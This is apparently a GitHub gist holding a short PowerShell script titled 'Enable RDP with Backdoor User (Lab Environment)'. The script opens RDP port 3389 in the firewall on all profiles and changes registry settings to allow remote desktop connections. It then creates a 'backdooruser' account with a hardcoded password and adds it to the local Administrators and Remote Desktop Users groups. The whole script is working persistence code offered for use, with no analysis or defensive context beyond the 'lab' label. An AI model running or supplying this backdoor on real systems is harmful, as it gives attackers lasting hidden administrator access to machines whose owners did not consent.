saunders-jake
saunders-jake
/ en.ps1
Created
February 21, 2025 21:08
Enable RDP with Backdoor User (Lab Environment)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| New-NetFirewallRule -DisplayName "RDP (TCP)" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389 -Profile Any -Enabled True | Out-Null | |
| New-NetFirewallRule -DisplayName "RDP (UDP)" -Direction Inbound -Action Allow -Protocol UDP -LocalPort 3389 -Profile Any -Enabled True | Out-Null | |
| Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server"-Name "fDenyTSConnections" -Value 0 | |
| Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services\Client" -Name "fClientDisableUDP" -Value 0 | |
| Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1 | |
| net user backdooruser S3cureP@ssw0rd /add | |
| net localgroup administrators backdooruser /add | |
| net localgroup "Remote Desktop Users" backdooruser /add |